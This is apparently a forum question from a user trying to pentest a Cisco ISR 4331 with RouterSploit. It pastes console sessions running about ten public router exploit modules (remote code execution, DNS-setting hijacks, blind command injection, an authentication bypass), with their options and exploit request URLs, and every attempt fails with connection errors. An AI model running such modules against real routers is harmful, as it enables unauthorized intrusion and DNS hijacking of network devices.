how to pentest a CISCO ISR 4331 with routersploit, when this model of router is not included in routersploits list of routers it can exploit

Penetration Testing Information Gathering
1

Hey there I’m trying to pentest a CISCO ISR 4331 using routersploit. But this model of router is not on the list of routers routersploit has available to exploit. when I try running routersploit running the autopwn on this router I just get the following results. All creds and routers “not vulnerable” except these ones below.

“IP” Could not verify exploitability :
http exploits/routers/asus/asuwart_lan_rce
http exploits/routers/shuttle/915wm_dns_change
http exploits/routers/netgear/dgn2200-dnslookup_cgi_rce
custom/tcp exploits/routers/cisco/catalyst_2960_rocem
http exploits/routers/cisco/secure_acs_bypass
http exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
http exploits/routers/dlink/dsl_2640b_dns_change
http exploits/routers/dlink/dsl_2740r_dns_change
custom/udp exploits/routers/dlink/dir_815_850l_rce
http exploits/routers/billion/billion_5200w_rce
http exploits/routers/3com/officeconnect_rce

I’m having trouble finding YouTube video or manual that explain how to properly investigate these links that cannot be verified. I also get mixed signals from these links even they they are not the same models as my router. After exploring all the options while writing this question Im pretty sure none if them can be used to pen test a CISCO 4331 ISR so any links or advice on how i can do this with routersploit or any other program would be appreciated.

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (3Com OfficeConnect RCE) > use exploits/routers/asus/asuswrt_lan_rce
rsf (AsusWRT Lan RCE) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Enable verbose output: true/false
infosvr_port 9999 Target InfoSVR Port

rsf (AsusWRT Lan RCE) > set target
[+] target =>
rsf (AsusWRT Lan RCE) > set target ip
[+] target =>
rsf (AsusWRT Lan RCE) > run
[*] Running module exploits/routers/asus/asuswrt_lan_rce…
[-] Connection error: http::80/vpnupload.cgi
[-] Failed to set ateCommand_flag variable

=>[dont know what to do here]
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (AsusWRT Lan RCE) > use exploits/routers/shuttle/915wm_dns_change
    rsf (Shuttle 915 WM DNS Change) > set target ip
    [+] target => ip
    rsf (Shuttle 915 WM DNS Change) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (Shuttle 915 WM DNS Change) > run
[] Running module exploits/routers/shuttle/915wm_dns_change…
[] Attempting to change DNS settings…
[] Primary DNS: 8.8.8.8
[] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1
=>[dont know what to do here]
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
rsf (Shuttle 915 WM DNS Change) > use exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
rsf (Netgear DGN2200 RCE) > set target “ip”
[+] target => “ip”
rsf (Netgear DGN2200 RCE) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false
username admin Username
password password Password

rsf (Netgear DGN2200 RCE) > run
[] Running module exploits/routers/netgear/dgn2200_dnslookup_cgi_rce…
[] It is not possible to check if target is vulnerable
[] Trying to invoke command loop…
[] It is blind command injection. Response is not available.

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use ‘show payloads’ and ‘set payload ’ commands.

cmd > show payload
[*] Executing ‘show payload’ on the device…
[-] Connection error: http://:80/dnslookup.cgi

cmd > set payload
[*] Executing ‘set payload’ on the device…
[-] Connection error: http://:80/dnslookup.cgi

=> [I don’t know if the fact that I’m able to send blind command injection mean i have actually connected to the CISCO ISR 4331 router]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • custom/tcp exploits/routers/cisco/catalyst_2960_rocem => when I entered run after gave me
    rsf (Netgear DGN2200 RCE) > use exploits/routers/cisco/catalyst_2960_rocem
    rsf (Cisco Catalyst 2960 ROCEM RCE) > set target ip
    [+] target => ip
    rsf (Cisco Catalyst 2960 ROCEM RCE) > show options

Target options:

Name Current settings Description

target ip Target IPv4 or IPv6 address
port 23 Target Telnet port

Module options:

Name Current settings Description

verbosity true Enable verbose output: true/false
action set set / unset credless authentication for Telnet service
device -1 Target device - use ‘show devices’

rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[*] Running module exploits/routers/cisco/catalyst_2960_rocem…
[-] Set target device - use “show devices” and “set device ”
rsf (Cisco Catalyst 2960 ROCEM RCE) > show devices

Target devices:
0 - Cisco Catalyst 2960 IOS 12.2(55)SE1
1 - Cisco Catalyst 2960 IOS 12.2(55)SE11

rsf (Cisco Catalyst 2960 ROCEM RCE) > set device 0
[+] device => 0
rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[] Running module exploits/routers/cisco/catalyst_2960_rocem…
[] Trying to connect to Telnet service on port 23
[-] ip:23 TCP Error while connecting to the server timed out
[-] Connection failed
rsf (Cisco Catalyst 2960 ROCEM RCE) > set device 1
[+] device => 1
rsf (Cisco Catalyst 2960 ROCEM RCE) > run
[] Running module exploits/routers/cisco/catalyst_2960_rocem…
[] Trying to connect to Telnet service on port 23
[-] ip TCP Error while connecting to the server timed out
[-] Connection failed
rsf (Cisco Catalyst 2960 ROCEM RCE) >

=>[I cant enter the line cmd, so I cant get further than this and I am not sure I am even connecting to a router]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (Cisco Catalyst 2960 ROCEM RCE) > use exploits/routers/cisco/secure_acs_bypass
rsf (Cisco Secure ACS Unauthorized Password Change) > set target
[+] target =>
rsf (Cisco Secure ACS Unauthorized Password Change) > show options

Target options:

Name Current settings Description

ssl true SSL enabled: true/false
target Target IPv4 or IPv6 address
port 443 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false
path /PI/services/UCP/ Path to UCP WebService
username Username to use
password Password to use

rsf (Cisco Secure ACS Unauthorized Password Change) > show devices

Target devices:
0 - Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed
1 - Cisco Secure ACS version 5.2 without any patches installed
2 - Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed

rsf (Cisco Secure ACS Unauthorized Password Change) > run
[] Running module exploits/routers/cisco/secure_acs_bypass…
[] Issuing password change request for:
[-] Connection error: https://ip/PI/services/UCP/
[-] Exploit failed. Target seems to be not vulnerable.

=>[I have no idea what is happening here]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (Cisco Secure ACS Unauthorized Password Change) > use exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > set target ip
[+] target => ip
rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > show devices

Target devices:
0 - D-Link DSL-2780B
1 - D-Link DSL-2730B
2 - D-Link DSL-526B

rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > run
[] Running module exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change…
[] Attempting to change DNS settings…
[] Primary DNS: 8.8.8.8
[] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=

=>[I have no idea what is happening here]

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (D-Link DSL-2780B & DSL-2730B & DSL-526B DNS Change) > use exploits/routers/dlink/dsl_2640b_dns_change
    rsf (D-Link DSL-2640B DNS Change) > set target ip
    [-] Invalid address. Provided address is not valid IPv4 or IPv6 address.
    rsf (D-Link DSL-2640B DNS Change) > set target ip
    [+] target => ip
    rsf (D-Link DSL-2640B DNS Change) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (D-Link DSL-2640B DNS Change) > show devices

Target devices:
0 - D-Link DSL-2640B

rsf (D-Link DSL-2640B DNS Change) > run
[] Running module exploits/routers/dlink/dsl_2640b_dns_change…
[] Attempting to change DNS settings…
[] Primary DNS: 8.8.8.8
[] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

-rsf (D-Link DSL-2640B DNS Change) > use exploits/routers/dlink/dsl_2740r_dns_change
rsf (D-Link DSL-2740R DNS Change) > set target ip
[+] target => ip
rsf (D-Link DSL-2740R DNS Change) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false
dns1 8.8.8.8 Primary DNS Server
dns2 8.8.4.4 Seconary DNS Server

rsf (D-Link DSL-2740R DNS Change) > show devices

Target devices:
0 - D-Link DSL-2740R

rsf (D-Link DSL-2740R DNS Change) > run
[] Running module exploits/routers/dlink/dsl_2740r_dns_change…
[] Attempting to change DNS settings…
[] Primary DNS: 8.8.8.8
[] Secondary DNS: 8.8.4.4
[-] Connection error: http://ip:80/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
-rsf (D-Link DSL-2740R DNS Change) > use exploits/routers/dlink/dir_815_850l_rce
rsf (D-Link DSL-2740R DNS Change) > use exploits/routers/dlink/dir_815_850l_rce
rsf (D-Link DIR-815 & DIR-850L RCE) > set target ip
[+] target => ip
rsf (D-Link DIR-815 & DIR-850L RCE) > show options

Target options:

Name Current settings Description

target ip Target IPv4 or IPv6 address
port 1900 Target UPNP port

Module options:

Name Current settings Description

verbosity true Enable verbose output: true/false

rsf (D-Link DIR-815 & DIR-850L RCE) > show devices

Target devices:
0 - D-Link DIR-815
1 - D-Link DIR-850L

rsf (D-Link DIR-815 & DIR-850L RCE) > set device 0
[-] You can’t set option ‘device’.
Available options: [‘verbosity’, ‘target’, ‘port’]
rsf (D-Link DIR-815 & DIR-850L RCE) > set device 1
[-] You can’t set option ‘device’.
Available options: [‘verbosity’, ‘target’, ‘port’]
rsf (D-Link DIR-815 & DIR-850L RCE) > run
[] Running module exploits/routers/dlink/dir_815_850l_rce…
[] It’s not possible to check if the target is vulnerable. Try to use following command loop.
[] Invoking command loop…
[] It is blind command injection, response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use ‘show payloads’ and ‘set payload ’ commands.

cmd > show payload
[*] Executing ‘show payload’ on the device…

cmd > set payload
[*] Executing ‘set payload’ on the device…

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (D-Link DIR-815 & DIR-850L RCE) > use exploits/routers/billion/billion_5200w_rce
    rsf (Billion 5200W-T RCE) > set target ip
    [+] target => ip
    rsf (Billion 5200W-T RCE) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Enable verbose output: true/false
telnet_port 9999 Telnet port used for exploitation
username admin Default username to log in
password password Default password to log in

rsf (Billion 5200W-T RCE) > show devices

Target devices:
0 - Billion 5200W-T

rsf (Billion 5200W-T RCE) > run
[] Running module exploits/routers/billion/billion_5200w_rce…
[] Trying to exploit first command injection vulnerability…
[-] Connection error: http://ip/cgi-bin/adv_remotelog.asp
[-] Exploitation failed for unauthenticated command injection
[] Trying authenticated commad injection vulnerability…
[] Trying exploitation with creds: user3:“really big number”
[-] Connection error: http://ip
[-] Exploit failed

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

  • rsf (Billion 5200W-T RCE) > use exploits/routers/3com/officeconnect_rce
    rsf (3Com OfficeConnect RCE) > set target ip
    [+] target => ip
    rsf (3Com OfficeConnect RCE) > show options

Target options:

Name Current settings Description

ssl false SSL enabled: true/false
target ip Target IPv4 or IPv6 address
port 80 Target HTTP port

Module options:

Name Current settings Description

verbosity true Verbosity enabled: true/false

rsf (3Com OfficeConnect RCE) > show devices

Target devices:
0 - 3Com OfficeConnect

rsf (3Com OfficeConnect RCE) > run
[*] Running module exploits/routers/3com/officeconnect_rce…
[-] Connection error: http://ip:80/utility.cgi?testType=1&IP=aaa
[-] Exploit failed - target does not seem to be vulnerable

=>[Don’t know what to do here either]
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

*****************************************************************************************************After exploring all the options while writing this question Im pretty sure none if them can be used to pen test a CISCO 4331 ISR so any links or advice on how i can do this with routersploit or any other program would be appreciated.